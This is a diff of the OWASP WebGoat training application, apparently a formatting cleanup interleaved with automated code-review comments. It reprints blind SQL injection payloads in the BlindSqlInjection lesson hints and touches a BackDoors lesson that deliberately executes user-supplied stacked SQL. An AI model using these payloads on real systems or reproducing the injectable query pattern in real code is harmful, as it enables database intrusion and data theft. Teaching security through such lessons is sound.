diff --git a/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/main/project/JavaSource/org/owasp/webgoat/Catcher.java index 563a91688..3d490e1f1 100644 --- a/main/project/JavaSource/org/owasp/webgoat/Catcher.java +++ b/main/project/JavaSource/org/owasp/webgoat/Catcher.java @@ -82,7 +82,7 @@ public class Catcher extends HammerHead // setCacheHeaders(response, 0); WebSession session = (WebSession) request.getSession(true).getAttribute(WebSession.SESSION); session.update(request, response, this.getServletName()); // FIXME: Too much in this - // call. + // call. int scr = session.getCurrentScreen(); Course course = session.getCourse(); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java index 6b0c337f4..873a9a91b 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java @@ -11,7 +11,6 @@ import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; @@ -504,9 +503,9 @@ public abstract class AbstractLesson extends Screen implements Comparable" - + "Send this message to: " + - s.getWebgoatContext().getFeedbackAddress() + ""); + + "Send this message to: " + s.getWebgoatContext().getFeedbackAddress() + ""); } Html html = new Html(); @@ -531,15 +530,15 @@ public abstract class AbstractLesson extends Screen implements Comparable" - + "Send this message to: " + - s.getWebgoatContext().getFeedbackAddress() + ""); + + "Send this message to: " + s.getWebgoatContext().getFeedbackAddress() + ""); } // Solutions are html files diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java index 0802a54a1..309e6336e 100644 
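Review bot: In the Catcher hunk, `request.getSession(true).getAttribute(WebSession.SESSION)` can return null when the HTTP session carries no WebSession yet, and the very next line dereferences it with `session.update(request, response, this.getServletName())`, so a request arriving before the attribute is set fails with a NullPointerException instead of a clear error. A guard such as `if (session == null) { throw new IllegalStateException("WebSession missing from HTTP session"); }` between the two lines makes the precondition explicit; whether every caller guarantees the attribute is present cannot be seen from this hunk. The `// FIXME: Too much in this call.` comment is only reflowed here, so the concern it records stays open. The enclosing method starts and ends outside the hunk.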
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java @@ -78,10 +78,11 @@ public class BackDoors extends SequentialLessonAdapter { return concept2(s); } - + private void addDBEntriesToEC(ElementContainer ec, ResultSet rs) { - try { + try + { if (rs.next()) { Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(1); @@ -92,7 +93,7 @@ public class BackDoors extends SequentialLessonAdapter tr.addElement(new TH("Salary")); tr.addElement(new TH("E-Mail")); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD(rs.getString("userid"))); tr.addElement(new TD(rs.getString("password"))); @@ -112,7 +113,8 @@ public class BackDoors extends SequentialLessonAdapter } ec.addElement(t); } - } catch (SQLException e) { + } catch (SQLException e) + { // TODO Auto-generated catch block e.printStackTrace(); } @@ -166,9 +168,8 @@ public class BackDoors extends SequentialLessonAdapter userInput = SELECT_ST + userInput; String[] arrSQL = userInput.split(";"); Connection conn = DatabaseUtilities.getConnection(s); - Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - + Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + if (arrSQL.length == 2) { if (userInput.toUpperCase().indexOf("CREATE TRIGGER") != -1) @@ -178,7 +179,6 @@ public class BackDoors extends SequentialLessonAdapter } ResultSet rs = statement.executeQuery(arrSQL[0]); addDBEntriesToEC(ec, rs); - } return ec; diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java index 121c12144..974abb709 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java 
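Review bot: The `catch (SQLException e)` in `addDBEntriesToEC` still carries the IDE marker `// TODO Auto-generated catch block` and only calls `e.printStackTrace()`, so a failed query leaves the table out of the page with nothing telling the user why. Since this catch is already being touched for brace style, the placeholder should be replaced by a comment that states the actual decision, e.g. `// Best-effort rendering: on a failed query the table is simply omitted`, or the exception should be propagated so the caller can report it. The method body spans several hunks here, so its remaining lines are not all visible.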
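Review bot: The `Statement` created on the reformatted `conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY)` line, and the `ResultSet` returned by `statement.executeQuery(arrSQL[0])` in the following hunk, are not closed anywhere in the visible lines, so every request leaves a cursor open on the connection until the driver reclaims it. Wrapping the query and the `addDBEntriesToEC(ec, rs)` call in `try { ... } finally { statement.close(); }` bounds their lifetime, since closing the statement also releases its result set. Whether `DatabaseUtilities.getConnection(s)` hands out a shared or per-request connection is not visible from the hunk; the enclosing method begins before it and its closing lines fall in the next hunk.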
@@ -89,8 +89,8 @@ public class BlindSqlInjection extends LessonAdapter ResultSet.CONCUR_READ_ONLY); ResultSet answer_results = answer_statement.executeQuery(answer_query); answer_results.first(); - //System.out.println("Account: " + accountNumber); - //System.out.println("Answer : " + answer_results.getString(1)); + // System.out.println("Account: " + accountNumber); + // System.out.println("Answer : " + answer_results.getString(1)); if (accountNumber.toString().equals(answer_results.getString(1))) { makeSuccess(s); @@ -144,7 +144,6 @@ public class BlindSqlInjection extends LessonAdapter return new StringElement("By Chuck Willis"); } - /** * Gets the hints attribute of the DatabaseFieldScreen object * @@ -153,35 +152,33 @@ public class BlindSqlInjection extends LessonAdapter protected List getHints(WebSession s) { List hints = new ArrayList(); - hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " - + "Create a SQL statement that you can use as a true/false test and then " - + "select the first character of the target element and do a start narrowing " - + "down the character using > and <" - + "
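Review bot: In the BlindSqlInjection hunk at line 89, the boolean returned by `answer_results.first()` is discarded before `answer_results.getString(1)` is read, so a query that returns no rows throws an SQLException rather than being treated as a wrong answer. Folding the cursor move into the condition, `if (answer_results.first() && accountNumber.toString().equals(answer_results.getString(1)))`, keeps the no-row case on the failure path without any other change. The enclosing method begins and ends outside the hunk.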

The backend database is HSQLDB. Keep that in mind if you research SQL functions " - + "on the Internet since different databases use some different functions and syntax."); - hints.add("This is the code for the query being built and issued by WebGoat:

" - + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); - hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command. " - + "You will need to make use of the following SQL functions: " - + "

SELECT - query for your target data and get a string " - + "

substr(string, start, length) - returns a " - + "substring of string starting at the start character and going for length characters " - + "

ascii(string) will return the ascii value of the first character in string " - + "

> and < - once you have a character's value, compare it to a choosen one"); - hints.add("Example: is the first character of the first_name of userid " + TARGET_ACCT_NUM - + " less than 'M' (ascii 77)? " - + "

101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM - + ") , 1 , 1) ) < 77 ); " - + "

If you get back that account number is valid, then yes. If get back that the number is" - + "invalid then answer is no."); - hints.add("Another example: is the second character of the first_name of userid " - + TARGET_ACCT_NUM - + " greater than 'm' (ascii 109)? " - + "

101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" - + TARGET_ACCT_NUM - + ") , 2 , 1) ) > 109 ); " - + "

If you get back that account number is valid, then yes. If get back that the number is " - + "invalid then answer is no."); + hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + + "Create a SQL statement that you can use as a true/false test and then " + + "select the first character of the target element and do a start narrowing " + + "down the character using > and <" + + "

The backend database is HSQLDB. Keep that in mind if you research SQL functions " + + "on the Internet since different databases use some different functions and syntax."); + hints.add("This is the code for the query being built and issued by WebGoat:

" + + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); + hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command. " + + "You will need to make use of the following SQL functions: " + + "

SELECT - query for your target data and get a string " + + "

substr(string, start, length) - returns a " + + "substring of string starting at the start character and going for length characters " + + "

ascii(string) will return the ascii value of the first character in string " + + "

> and < - once you have a character's value, compare it to a choosen one"); + hints.add("Example: is the first character of the first_name of userid " + TARGET_ACCT_NUM + + " less than 'M' (ascii 77)? " + + "

101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM + + ") , 1 , 1) ) < 77 ); " + + "

If you get back that account number is valid, then yes. If get back that the number is" + + "invalid then answer is no."); + hints.add("Another example: is the second character of the first_name of userid " + TARGET_ACCT_NUM + + " greater than 'm' (ascii 109)? " + + "

101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM + + ") , 2 , 1) ) > 109 ); " + + "

If you get back that account number is valid, then yes. If get back that the number is " + + "invalid then answer is no."); return hints; } @@ -233,7 +230,7 @@ public class BlindSqlInjection extends LessonAdapter super.handleRequest(s); } catch (Exception e) { - //System.out.println("Exception caught: " + e); + // System.out.println("Exception caught: " + e); e.printStackTrace(System.out); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java index e661e06a3..290fab958 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java @@ -68,7 +68,7 @@ public class CSRF extends LessonAdapter private final static int TITLE_COL = 2; private static int count = 1; private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted - // message + // message private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") .setBorder(0).setHspace(0).setVspace(0); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java index 063b57420..87a14c8a6 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java @@ -40,7 +40,7 @@ public class Category implements Comparable { public final static Category INTRODUCTION = new Category("Introduction", new Integer(5)); - + public final static Category GENERAL = new Category("General", new Integer(100)); public final static Category ACCESS_CONTROL = new Category("Access Control Flaws", new Integer(200)); 
@@ -64,7 +64,7 @@ public class Category implements Comparable public final static Category INJECTION = new Category("Injection Flaws", new Integer(1200)); public final static Category INSECURE_COMMUNICATION = new Category("Insecure Communication", new Integer(1300)); - + public final static Category INSECURE_CONFIGURATION = new Category("Insecure Configuration", new Integer(1400)); public final static Category INSECURE_STORAGE = new Category("Insecure Storage", new Integer(1500)); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java index 924767fb8..2b06a26ab 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java @@ -282,7 +282,6 @@ public class Challenge2Screen extends SequentialLessonAdapter */ /* * (non-Javadoc) - * * @see lessons.LessonAdapter#doStage3(session.WebSession) */ protected Element doStage3(WebSession s) throws Exception @@ -631,7 +630,7 @@ public class Challenge2Screen extends SequentialLessonAdapter t.setBorder(1); } - String[] colWidths = new String[]{"55", "110", "260", "70"}; + String[] colWidths = new String[] { "55", "110", "260", "70" }; TR tr = new TR(); tr.addElement(new TH().addElement("Protocol").setWidth(colWidths[0])); tr.addElement(new TH().addElement("Local Address").setWidth(colWidths[1])); @@ -678,7 +677,7 @@ public class Challenge2Screen extends SequentialLessonAdapter tr = new TR(); TD td; StringTokenizer tokens = new StringTokenizer(lines.nextToken(), "\t "); - while (tokens.hasMoreTokens() && columnCount <4) + while (tokens.hasMoreTokens() && columnCount < 4) { td = new TD().setWidth(colWidths[columnCount++]); tr.addElement(td.addElement(tokens.nextToken())); 
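Review bot: In the Challenge2Screen hunk at line 678, the loop bound `columnCount < 4` in the reformatted while condition duplicates the length of `colWidths`, which the previous hunk of this file declares with four entries, and the loop body indexes `colWidths[columnCount++]`, so the literal and the array must be kept in step by hand. Writing the condition as `while (tokens.hasMoreTokens() && columnCount < colWidths.length)` ties the bound to the array and removes the magic number. The enclosing method starts and ends outside the hunk.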
@@ -725,7 +724,7 @@ public class Challenge2Screen extends SequentialLessonAdapter osw.write(message); } catch (Exception e) { - //System.out.println("Couldn't write " + message + " to " + s); + // System.out.println("Couldn't write " + message + " to " + s); e.printStackTrace(); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java index 804f26fb8..530a74af1 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java @@ -95,8 +95,6 @@ public class ClientSideFiltering extends SequentialLessonAdapter t.setID("hiddenEmployeeRecords"); t.setStyle("display: none"); - - workspaceDiv.addElement(t); @@ -334,7 +332,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter hints.add("Stage 1: Use Firebug to find where the information is stored on the client side."); - hints.add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu."); + hints + .add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu."); hints.add("Stage 1: Look in the last row of the hidden table."); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java index c3bbdf763..20034a318 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java 
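Review bot: In the ClientSideFiltering hunk at line 334, the formatter has split the receiver from its call so that `hints` and `.add("Stage 1: Examine the hidden table ...")` sit on separate lines, which reads as if a chained call were starting and is harder to scan than the surrounding `hints.add(...)` lines; the same split appears in the CrossSiteScripting hunk at line 148. Breaking the long string literal instead, `hints.add("Stage 1: Examine the hidden table to see if there is anyone listed " + "who is not in the drop down menu.");`, keeps the call on one line and matches the other hints. The enclosing getHints method starts and ends outside the hunk.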
@@ -137,7 +137,7 @@ public class ConcurrencyCart extends LessonAdapter } catch (ParameterNotFoundException pnfe) { - //System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage"); + // System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage"); ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4); } @@ -154,9 +154,7 @@ public class ConcurrencyCart extends LessonAdapter } /* - * ********************************************************************* ****************** - * PURCHASING PAGE ********************************** - * ********************************************************************* + * PURCHASING PAGE */ private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3, @@ -303,9 +301,7 @@ public class ConcurrencyCart extends LessonAdapter } /* - * ********************************************************************* ****************** - * CONFIRMATION PAGE ******************************** - * ********************************************************************* + * CONFIRMATION PAGE */ private ElementContainer confirmation(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) @@ -420,9 +416,7 @@ public class ConcurrencyCart extends LessonAdapter } /* - * ********************************************************************* ****************** - * SHOPPING PAGE ********************************** - * ********************************************************************* + * SHOPPING PAGE */ private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java index 1260b13b0..96ae2e6da 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java 
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java @@ -98,23 +98,25 @@ public class CrossSiteScripting extends GoatHillsFinancial { return Category.XSS; } - - - public String getLessonSolutionFileName(WebSession s) { + + public String getLessonSolutionFileName(WebSession s) + { String solutionFileName = null; String stage = getStage(s); solutionFileName = "/lesson_solutions/Lab XSS/Lab " + stage + ".html"; return solutionFileName; } - + @Override - public String getSolution(WebSession s) { + public String getSolution(WebSession s) + { String src = null; try { - //System.out.println("Solution: " + getLessonSolutionFileName(s)); - src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false); + // System.out.println("Solution: " + getLessonSolutionFileName(s)); + src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), + false); } catch (IOException e) { s.setMessage("Could not find the solution file"); @@ -123,7 +125,7 @@ public class CrossSiteScripting extends GoatHillsFinancial return src; } - + /** * Gets the hints attribute of the DirectoryScreen object * @@ -148,9 +150,9 @@ public class CrossSiteScripting extends GoatHillsFinancial // Stage 3 - // Stage 4 - hints.add("Stage4: Examine content served in response to form submissions looking for data taken from the form."); + hints + .add("Stage4: Examine content served in response to form submissions looking for data taken from the form."); hints.add("Stage4: There is a class called HtmlEncoder in org.owasp.webgoat.util"); // Stage 5 hints @@ -179,8 +181,8 @@ public class CrossSiteScripting extends GoatHillsFinancial } else if (STAGE2.equals(stage)) { - instructions = "Stage 2: Block Stored XSS using Input Validation.
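Review bot: In the CrossSiteScripting hunk at line 98, `getSolution` builds `new BufferedReader(new FileReader(...))` inline and hands it to `readFromFile`, so the reader is closed only if `readFromFile` closes it, and nothing in the hunk guarantees that; an IOException thrown part-way leaves the file handle open. Holding the reader in a local and closing it in a `finally` block closes it on every path, as sketched below; `readFromFile` is defined outside this hunk, so check whether it already closes its argument before duplicating that. `FileReader` also decodes with the platform default charset, so the solution HTML may render differently across hosts; that is a separate change and is left out of the sketch.
```java
public String getSolution(WebSession s)
{
    String src = null;
    BufferedReader in = null;
    try
    {
        // System.out.println("Solution: " + getLessonSolutionFileName(s));
        in = new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s))));
        src = readFromFile(in, false);
    }
    catch (IOException e)
    {
        s.setMessage("Could not find the solution file");
        // … unchanged: rest of the catch block …
    }
    finally
    {
        // Close on every path; a failure to close is not worth masking the real error.
        if (in != null)
        {
            try { in.close(); } catch (IOException ignored) { /* best-effort close */ }
        }
    }
```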

" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + instructions = "Stage 2: Block Stored XSS using Input Validation.

" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + "Implement a fix to block the stored XSS before it can be written to the database. " + "Repeat stage 1 as 'Eric' with 'David' as the manager. Verify that 'David' is not affected by the attack."; } @@ -192,8 +194,8 @@ public class CrossSiteScripting extends GoatHillsFinancial } else if (STAGE4.equals(stage)) { - instructions = "Stage 4: Block Stored XSS using Output Encoding.

" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + instructions = "Stage 4: Block Stored XSS using Output Encoding.

" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + "Implement a fix to block XSS after it is read from the database. " + "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack."; } @@ -205,8 +207,8 @@ public class CrossSiteScripting extends GoatHillsFinancial } else if (STAGE6.equals(stage)) { - instructions = "Stage 6: Block Reflected XSS using Input Validation.

" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + instructions = "Stage 6: Block Reflected XSS using Input Validation.

" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + "Implement a fix to block this reflected XSS attack. " + "Repeat step 5. Verify that the attack URL is no longer effective."; } @@ -258,28 +260,28 @@ public class CrossSiteScripting extends GoatHillsFinancial } } catch (ParameterNotFoundException pnfe) { - //System.out.println("Missing parameter"); + // System.out.println("Missing parameter"); pnfe.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (ValidationException ve) { - //System.out.println("Validation failed"); + // System.out.println("Validation failed"); ve.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (UnauthenticatedException ue) { s.setMessage("Login failed"); - //System.out.println("Authentication failure"); + // System.out.println("Authentication failure"); ue.printStackTrace(); } catch (UnauthorizedException ue2) { s.setMessage("You are not authorized to perform this function"); - //System.out.println("Authorization failure"); + // System.out.println("Authorization failure"); ue2.printStackTrace(); } catch (Exception e) { // All other errors send the user to the generic error page - //System.out.println("handleRequest() error"); + // System.out.println("handleRequest() error"); e.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java index 4224c606e..e351aab12 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java 
@@ -97,8 +97,8 @@ public class EditProfile extends DefaultLessonAction .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { @@ -141,8 +141,8 @@ public class EditProfile extends DefaultLessonAction .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java index 9623c28e1..1ab4068e1 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java @@ -104,11 +104,11 @@ public class FindProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } 
@@ -171,8 +171,8 @@ public class FindProfile extends DefaultLessonAction .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */ setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer.toString(id)); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java index 330af3a85..b2e8d0fa8 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java @@ -94,11 +94,11 @@ public class UpdateProfile extends DefaultLessonAction chainedAction.handleRequest(s); } catch (UnauthenticatedException ue1) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue1.printStackTrace(); } catch (UnauthorizedException ue2) { - //System.out.println("Internal server error"); + // System.out.println("Internal server error"); ue2.printStackTrace(); } } @@ -111,8 +111,8 @@ public class UpdateProfile extends DefaultLessonAction { // The input validation can be added using a parsing component // or by using an inline regular expression. The parsing component - // is the better solution. - + // is the better solution. + HttpServletRequest request = s.getRequest(); String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME); String lastName = request.getParameter(CrossSiteScripting.LAST_NAME); 
@@ -129,7 +129,6 @@ public class UpdateProfile extends DefaultLessonAction String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE); String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES); String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION); - Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java index 80499438b..430c4cb79 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java @@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons.CrossSiteScripting; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; - import org.apache.ecs.xhtml.html; import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; @@ -16,7 +15,6 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; - import com.sun.corba.se.spi.activation.Server; @@ -92,7 +90,6 @@ public class ViewProfile extends DefaultLessonAction { Employee profile = null; - // Query the database for the profile data of the given employee try { 
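Review bot: In the ViewProfile hunk at line 16, the import `com.sun.corba.se.spi.activation.Server` survives while only the blank line above it is trimmed, yet no `Server` appears in any ViewProfile hunk of this commit; it looks like an IDE auto-import that should be deleted rather than tidied. It is also a JDK-internal `com.sun.*` type, so the file will stop compiling on a JDK that no longer ships CORBA even though the symbol is never used. If the rest of the file does not reference it, drop the line `import com.sun.corba.se.spi.activation.Server;`.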
@@ -108,15 +105,15 @@ public class ViewProfile extends DefaultLessonAction // Note: Do NOT get the password field. profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results - .getString("title"), answer_results.getString("phone"), - answer_results.getString("address1"), answer_results.getString("address2"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results .getInt("manager"), answer_results.getString("start_date"), answer_results .getInt("salary"), answer_results.getString("ccn"), answer_results .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { @@ -131,14 +128,13 @@ public class ViewProfile extends DefaultLessonAction return profile; } - public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException { // Query the database to determine if this employee has access to this function // Query the database for the profile data of the given employee if "owned" by the given // user - + Employee profile = null; // Query the database for the profile data of the given employee 
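Review bot: In the ViewProfile hunk at line 131, `getEmployeeProfile_BACKUP` is a second copy of the profile query kept under a `_BACKUP` suffix, and this commit reformats it instead of removing it; duplicated query code drifts, and the comment reflow in the next hunk already had to be applied to both copies. If nothing calls it (not visible from these hunks), delete the method and let version control keep the history; if it is kept on purpose, a comment at the declaration such as `// Reference copy of the profile query kept for the lesson; not invoked by any action` should say so. The method's body continues in the following hunk.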
@@ -162,11 +158,10 @@ public class ViewProfile extends DefaultLessonAction .getInt("salary"), answer_results.getString("ccn"), answer_results .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); - /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java index acb8d5d41..62d20ec0a 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java @@ -124,8 +124,8 @@ public class DBCrossSiteScripting extends GoatHillsFinancial String stage = getStage(s); if (STAGE1.equals(stage)) { - instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.

"+ - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.

" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

